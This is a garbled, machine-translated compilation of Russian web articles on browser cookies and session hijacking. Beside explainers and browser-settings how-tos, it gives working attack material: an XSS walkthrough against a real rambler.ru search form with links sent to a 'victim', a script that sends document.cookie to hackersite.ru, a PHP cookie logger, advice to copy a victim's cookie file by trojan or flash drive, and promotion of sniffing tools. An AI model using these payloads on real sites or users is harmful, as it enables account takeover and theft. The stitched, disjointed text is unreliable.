My friend forgot the password to one site. However, he previously checked the "Remember me" box at the time of signing in. Google browser Chrome, which allowed him to log into the site under his account. I was asked if this magical state can be transferred to another computer. It would be more correct, of course, to change or restore the password, but the acquaintance could not do this for reasons not related to the case.

How to use intercepter-ng for dummies

Despite the variety of choice of modern software, it is difficult to find programs for hacking for android better than intercepter ng. The first criterion pointing in favor of this product is its actual performance. Most of the proposed sniffers on the network are only an imitation that does not perform the declared functions.

The next positive factors are the versatility of the application and the coverage of a wide audience of users.

Computer help 939-29-71

Let's start in order. Cookies or "cookies" are very small text files - bookmarks with information.

The web server sends this information to the user's browser. where this information is stored until required. Not quite clear. Well. OK.

I'll try to make it even easier. See. you have registered on any site.

At the time of registration, these very "cookies" are created.

Here they are.

Cookie Cadger

The program listens to traffic on the WiFi network, intercepts cookies and replicates the user's session in your browser, repeating requests with his credentials. Author Matthew Sullivan gave a presentation of the program on September 30 at the Derbycon hacker conference. Right during the speech, Matthew Sullivan intercepted an unsecured session with Google of one of the conference attendees via WiFi.

How to steal cookies

If, while on the site page, you enter into address bar Firefox browser or Opera the following text: javascript:document.write(document.cookie); you will see something like: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformation=0; remixMembersBar=0; remix description=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Attention! .

The Complete Guide to Cross-Site Scripting

XSS is a type of vulnerability software, native to Web applications that allows an attacker to inject client-side script into web pages viewed by other users Wikipedia has the following definition for XSS: “Cross-site scripting (XSS) is a type of software vulnerability native to Web applications (by circumventing security restrictions browser)" that allows an attacker to inject client-side script into web pages viewed by other users.

Difference between cookies and sessions

Not so long ago I wrote an article on how to register and authorize users on the site.

". In this article, I'm going to break down the difference between sessions and cookies. to make your final choice.

Cookies. No, it's not about cookies, it's about your safety. Here you go to your favorite site "vkontakte" (or, for example, look at mail) on someone else's computer, refuse the "save password" option, happily look through the mail and leave. And do not think about the fact that under your name you can now go to social network or mail.

I don't even consider the situation of a program that remembers a password without you knowing it. This is already a deliberate hack, and you will probably suspect that something like this can happen and you will not go to your favorite site on such a computer. But we can talk about simple human curiosity - we were visiting friends, and then once, and they get the opportunity to read your mail. Are you sure that they will refuse such an opportunity? Aren't you afraid that something will come up? In any case, I will put aside moral issues and just talk about how the information is stored on the computer that you can now be allowed into some site without asking for a password.

how to steal cookies

And the name of this technology is cookies.

And this is where it all started. The http protocol, on which, in fact, you browse sites (including this one) did not initially imply the possibility of maintaining a connection. That is, roughly speaking, you send a request to the site, get a response, it is displayed on the screen, and then the server does not remember anything about you. Of course, this is good when the site is purely informational and should not remember anything about you, but we live in the Web 2.0 age 😉 The natural development of the protocol is POST and GET requests, when you send some data, the server can write them to the database data, but this is not enough.

Let's look at a very simple example. Forum. So you registered, and there is a record on the forum that there is such and such a user with such and such a password and some other additional data. But now you go to the forum and log in - enter your password. Somewhere there should be information that you are logged in. On server? Of course not! It is impossible to save information on the server that authorization was made from your computer - it will not be able to distinguish you from someone else (even your IP address does not uniquely identify you)! Thus, information that authorization has occurred must be stored on your computer. That's what cookies are for, that's what they were created for.

A cookie is a small record on your computer that stores information about the site you have visited. Upon authorization, a similar entry is created, after which you can already walk around the forum, and it will recognize you. However, this will already happen automatically - thanks to the information stored in the cookie - so pretending that you are the main administrator of the forum will still not work bypassing the password verification.

Now we can return to where this article began. If you logged in somewhere without even saving your password, then it may happen that an entry has been created on the computer that now allows you to enter this resource under your name without authorization. Such an entry itself will become obsolete after a while, but you can force it to be cleared. Each browser does this differently, I'll show you how to do it in my favorite Google Chrome. Opening the options

Go to the "advanced" tab and find the "show cookies" button

Now, of course, you can delete all cookies, but this can upset the computer owner. Therefore, for example, in the upper field you can enter the name of the site you are interested in

Then only the cookies related to this site can be cleared. You can try mine. Moreover, if you log in to my forum, and then clear your cookies, then the authorization information will be forgotten. Try it!

comments powered by

1. What is XSS
An XSS type vulnerability allows inserting arbitrary javascript code into the body of a page. XSS attack differs from others (eg SQL injection or PHP injection) in that it acts not on the server, but on the client.

how to steal cookies

With its help, you cannot view database tables, upload a shell, etc. The most common use of XSS is to steal cookies.
Cookies (Cookies) - a small piece of data created by a web server and stored on the user's computer as a file. Typically, cookies are used to store accounts, and, most often, they contain an encoded password, login, and session ID. (Though not always)
XSS are of two types, active and passive.

Passive XSS require the victim to directly participate, for example, follow a link containing javascript code. When using this type of XSS, you cannot do without SI (Social Engineering)

Active XSS do not require any participation from the victim, she just needs to go to the page with XSS. Active XSS can be, for example, in forum posts, chats, in adding news, etc.

2.Search XSS
In this paragraph, I will tell you how to find xss

2.1 Passive XSS
To find passive XSS, just substitute in the input form if the script worked and the message "xss" appeared, then the vulnerability is present, if the script did not work, you can still try ">, this is probably the most common xss vulnerability. If neither one nor the other script worked, then there is most likely no vulnerability.
Let's look at an example.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
See the "search" form? put in there "> and click "find"
A window with xss flew out, which means xss is present. (Perhaps at the time you read this article, this xss will already be fixed)

2.2 Active XSS
Such CSS can be, for example, in profile fields, when adding news in the name of the news and in the news itself (less often), in messages on forums / chats / guestbooks with html enabled. Everything is simple here, we enter the script from the previous subparagraph into the fields, and if the message is displayed on the screen, then the vulnerability is present.
Consider xss in BB tags on the forums.
you can try to stupidly insert javascript code into the tag, like this:
javascript:alert('xss')
Some tags have parameters, for example, the tag has dynsrc and lowsrc parameters, let's try to substitute the code like this:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
If the script worked, xss is

3.Using XSS to steal cookies
Now the most delicious
In order to steal cookies, we need a web sniffer, you can install some kind of sniffer on your hosting, or you can use an online sniffer, which are now full.
To steal cookies through passive XSS, the victim needs to follow a poisonous link. To steal cookies we will use instead another script:
we substitute the script in the link and let the victim follow it, see the sniffer log and rejoice.
Let's look at an example.
Let's take that XSS on the rambler from the previous paragraph.
Paste
">
in the search form, click "find", look at the address bar and see:

http://miss.rambler.ru/srch/?sort=0& … &words =">
We throw this link to the victim and enjoy the cookies.
Seeing such a link, the victim may suspect something, so it is advisable to encode
">
in URL Or use services like http://tinyurl.com/
Let's move on to active XSS, everything is simple here, instead of alert() we insert img = new Image(); img.src = "sniffer image address"+document.cookie;

Now we have cookies. But what to do with them? It's simple, they must be substituted instead of their own. AT Opera browser there is a built-in cookie editor (tools-> advanced-> cookie management), there is a plugin for firefox (I don’t remember the name, use google)
That's all for now, perhaps the article will be supplemented

To the question How to get COOKIES cokies. Need cookies how to get please tell me!!! 1 set by the author Vlad eeEEeeeeeeeeee the best answer is What are cookies?
The fact is that in the process of development of www-technologies and the introduction of programming languages ​​on the Internet, a very serious problem arose before the developers of programs - how to save the results of the algorithm execution for each specific user on for a long time? By itself, the HTTP protocol does not have the ability to capture the results of software processes. Using sessions is also not a solution to the problem, since their action is terminated immediately after the connection to the server is broken.
The problem was resolved with the introduction of the cookies mechanism (that is, translated from English, "cookies"). Cookies have a remarkable property - they are stored on the user's hard drive and can be stored there for an almost unlimited time.
At their core, cookies are plain text files stored in a special directory used by the browser (usually called Temporary Internet Files), and you can see them by going to that directory ( fast access to it for the IE browser is carried out through the menu items Tools -> Internet Options -> Temporary Internet Files -> Settings -> View
Some cookies can only be stored for one session, they are deleted after the browser is closed. Others, set for a certain period of time, are written to a file. In general, this file is called "cookies.txt" (but there may be several) and is located in the working directory of the browser installed on the computer.
in other words
A cookie is a small piece of textual information that the server sends to the browser. By themselves, cookies cannot do anything, but when a user accesses the server (types its address in the browser line), the server can read the information contained in the cookies and, based on its analysis, perform any actions. For example, in the case of authorized access to something via the web, the login and password are stored in cookies during the session, which allows the user not to enter them again when requesting each password-protected document.
If you are trying to get access through this topic to someone else's password-protected accounts, then you need to find a way remotely (trojan) or by impudently copying to a flash drive, if you have access to the computer where the victim works, copy this cookie.txt file and replace it in your (same) your browser on it. Then you go to the desired site where the account you are interested in, and automatically get access. But keep in mind, if the victim presses the exit from the account (for example, from the mail) at the end of the work, then the session information will be erased in the cookies and you will not get any access.
Mozilla Firefox stores cookies in the user profile, in the file C:Documents and SettingsUsernameApplication DataMozillaFirefoxProfiles<имя профиля>cookies.txt
nternet explorer saves these cookies as separate text files in the folder C:Documents and SettingsUsernameCookies
Opera stores cookies in the file C:Documents and SettingsUsernameApplication DataOperaOperaprofilecookies4.dat

Cookies - information in the form of a text file, stored on the user's computer by the website. Contains authentication data (login/password, ID, phone number, address mailbox), user settings, access status. Stored in the browser profile.

Cookie hack is the theft (or "hijacking") of a visitor's session to a web resource. Secret information becomes available not only to the sender and recipient, but also to a third party - the person who intercepted.

Cookie Hacking Tools and Techniques

Computer thieves, like their colleagues in real life, in addition to skills, dexterity and knowledge, of course, have their own tools - a kind of arsenal of master keys and probes. Let's get acquainted with the most popular tricks of hackers, which they use to fish out cookies from the inhabitants of the Internet.

Sniffers

Special programs to monitor and analyze network traffic. Their name comes from the English verb "sniff" (sniff), because. literally "sniff out" transmitted packets between nodes.

But attackers use a sniffer to intercept session data, messages, and other confidential information. The object of their attacks are mostly insecure networks, where cookies are sent in an open HTTP session, that is, they are practically not encrypted. (Public Wi-Fi is the most vulnerable.)

The following methods are used to inject a sniffer into the Internet channel between the user's host and the web server:

• "listening" to network interfaces (hubs, switches);
• branching and copying traffic;
• connection to the break of the network channel;
• analysis through special attacks that redirect victim traffic to a sniffer (MAC-spoofing, IP-spoofing).

The abbreviation XSS stands for Cross Site Scripting. It is used to attack websites in order to steal user data.

The way XSS works is as follows:

• an attacker injects malicious code (a special masked script) onto a web page of a site, forum, or into a message (for example, when chatting on a social network);
• the victim visits the infected page and activates set code on your PC (clicks, follows a link, etc.);
• in turn, the activated malicious code "extracts" the user's confidential data from the browser (in particular, cookies) and sends them to the attacker's web server.

In order to “implant” a software XSS mechanism, hackers use all sorts of vulnerabilities in web servers, online services and browsers.

All XSS vulnerabilities are divided into two types:

• Passive. The attack is obtained by querying a specific web page script. Malicious code can be entered in various forms on a web page (for example, in a search bar on a site). The most susceptible to passive XSS are resources that do not filter HTML tags when data arrives;
• Active. Located directly on the server. And they are activated in the victim's browser. They are actively used by scammers in various blogs, chats and news feeds.

Hackers carefully "camouflage" their XSS scripts so that the victim does not suspect anything. They change the file extension, pass off the code as an image, motivate them to follow the link, attract them with interesting content. As a result: a PC user who has not coped with his own curiosity, with his own hand (with a mouse click) sends session cookies (with a login and password!) To the author of the XSS script - a computer villain.

Cookie spoofing

All cookies are stored and sent to the web server (from which they "came") without any changes - in their original form - with the same values, strings and other data. Intentional modification of their parameters is called cookie spoofing. In other words, when a cookie is spoofed, the attacker is wishful thinking. For example, when making a payment in an online store, the amount of payment is changed in the cookie to a smaller side - thus there is a “savings” on purchases.

Stolen session cookies on a social network from someone else's account are “inserted” into another session and on another PC. The owner of the stolen cookies receives full access to the victim's account (correspondence, content, page settings) as long as she is on her page.

"Editing" cookies is carried out using:

• functions "Manage cookies ..." in the Opera browser;
• add-ons Cookies Manager and Advanced Cookie Manager for FireFox;
• IECookiesView utilities (for Internet Explorer only);
• text editor like AkelPad, NotePad or Windows notepad.

Physical access to data

Highly simple circuit implementation consists of several steps. But it is effective only if the victim's computer with open session, for example Vkontakte, is left unattended (and for quite a long time!):

1. Enter into the address bar of the browser javascript function, which displays all saved cookies.
2. After pressing "ENTER" they all appear on the page.
3. Cookies are copied, saved to a file, and then transferred to a flash drive.
4. On another PC, cookies are being replaced in a new session.
5. Access to the victim's account is opened.

As a rule, hackers use the above tools (+ others) both in combination (since the level of protection on many web resources is quite high) and separately (when users are overly naive).

XSS + sniffer

1. An XSS script is created, which specifies the address of the online sniffer (of its own production or a specific service).
2. The malicious code is saved with the .img extension (picture format).
3. Then this file is uploaded to the site page, chat, or personal message - where the attack will be carried out.
4. The user's attention is drawn to the created "trap" (here social engineering comes into play).
5. If the "trap" works, cookies from the victim's browser are intercepted by the sniffer.
6. The cracker opens the sniffer logs and extracts the stolen cookies.
7. Then it performs a substitution to obtain the rights of the account owner using the above tools.

Protecting cookies from hacking

1. Use an encrypted connection (using appropriate protocols and security methods).
2. Do not respond to dubious links, pictures, tempting offers to get acquainted with the "new free software". Especially from strangers.
3. Use only trusted web resources.
4. End an authorized session by pressing the "Logout" button (and not just close the tab!). Especially if the account was not logged in with personal computer, but, for example, from a PC in an Internet cafe.
5. Do not use the "Save Password" feature of your browser. Stored registration data increases the risk of theft at times. Do not be lazy, do not spare a few minutes of time to enter a password and login at the beginning of each session.
6. After web surfing - visiting social networks, forums, chats, sites - delete saved cookies and clear the browser cache.
7. Update browsers and antivirus software regularly.
8. Use browser extensions that protect against XSS attacks (for example, NoScript for FF and Google Chrome).
9. Periodically in accounts.

And most importantly - do not lose vigilance and attention while relaxing or working on the Internet!

What is a cookie?

There is a mechanism that allows the http server to store on the user's computer some text information and then contact her. This information called a cookie. In fact, each cookie is a pair: the name of the parameter and its value. Each cookie is also assigned the domain to which it belongs. For security purposes, in all browsers, the http server is only allowed to access its own domain cookie. Additionally, cookies can have an expiration date, in which case they will be stored on the computer until this date, even if all browser windows are closed.

Why are cookies important?

In all multi-user systems, cookies are used to identify the user. Or rather, the current connection of the user with the service, the user session. If someone recognizes your cookies, they can log in on your behalf. Because in this moment very few Internet resources check the change of the IP address during one user session.

How to change or change cookies?

Browser developers do not provide built-in tools for editing cookies. But you can get by with a regular notepad (notepad).

Step 1: create text file with text

Windows Registry Editor Version 5.00



@="C:\\IE_ext.htm"

We save it under the name IE_ext.reg

Step 2: Using the created file, add changes to the Windows registry.

Step 3: create a text file with text

< script language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);

Save it as C:\IE_ext.htm

Step 4: We go to the website of interest to us.

Step 5: Right click mouse clicks on free space page and select the menu item "Working with Cookies". Allow access to the clipboard. Your cookies for this site will be placed on the clipboard. You can paste their notepad (notepad) and see.

Step 6: To change some cookie, edit the C:\IE_ext.htm file, replacing testname in the name of the cookie, testvalue- on its meaning, testdomain.ru- to the website domain. Add more lines like this if needed. For the convenience of control, I added the output of the current cookies to the script before and after the change: alert(external.menuArguments.document.cookie);

Step 7: Run Step 5 again and then refresh the page.

Bottom line: we will go to this Internet resource with updated cookies.

How to steal cookies with JavaScript?

If the attacker managed to find an opportunity to execute an arbitrary JavaScript script on the victim's computer, then read current cookies he can very easily. Example:

varstr=document.cookie;

But will he be able to transfer them to his site, because, as I pointed out earlier, a JavaScript script cannot additional confirmation access a site located in another domain? It turns out that a JavaScript script can load any image located on any http server. At the same time, transfer any textual information in the download request to this picture. Example: http://hackersite.ru/xss.jpg?text_info So if you run this code:

varimg= newImage();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);

then the cookies will be in the request to download the "picture" and "leave" to the attacker.

How to handle such requests to upload a "picture"?

An attacker only needs to find hosting with php support and place code like this:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Then all query parameters to this script will be saved in the file log.txt. It remains only in the previously described JavaScript script to replace http://hackersite.ru/xss.jpg to the path to this php script.

Outcome

I have shown only the simplest way to exploit XSS vulnerabilities. But it proves that the presence of at least one such vulnerability on a multi-user Internet site can allow an attacker to use its resources on your behalf.

Opera open the main menu, go to the "Settings" section and select the line " General settings...". And you can just press hot CTRL keys+ F12. This will open the browser settings window, where on the "Advanced" tab you need to click on the "Cookies" section in the left pane. In it, you need to click the "Manage Cookies" button.

AT Mozilla FireFox open the "Tools" section in the menu and select the "Settings" item. In the settings window, you need to go to the "Privacy" tab, find the button there that says "Show Cookies ..." and click it to access the list of cookies stored by the browser. Here they can be searched and viewed.

In Internet Explorer, expand the "Tools" section in the menu and select "Properties". In the property settings window, go to the General tab and click the Options button in the Browsing History section. In this way, you will open another window (“Temporary Files Options”), in which you need to click the “Show Files” button.

Click the "Name" heading in the list of contents of the Internet Explorer temporary files folder that opens - this way you can group all cookies into one block in a common pile of heterogeneous files. Here you can find the file of interest and open it in a standard Notepad for viewing or editing.

In Google Chrome, click the wrench icon in the upper right corner of the window and select Options from the menu. The browser will open the "Settings" page, and you click on the "Advanced" link in its left pane and on the advanced settings page, click on the "Content Settings" button. It's not yet the last page on the way to the cookies stored by this browser.

Click the "All cookies and site data" button on the next page and you will finally have access to the list of cookies.

Google Chrome provides the ability to search, view and delete cookies.

In the Safari browser, click the gear icon on the right upper corner and select the line "Settings ...". In the window for changing settings, you need to go to the "Security" tab in order to click the "Show Cookies" button there. Safari only provides functions for searching and deleting cookies, the contents of these temporary files can only be partially seen here.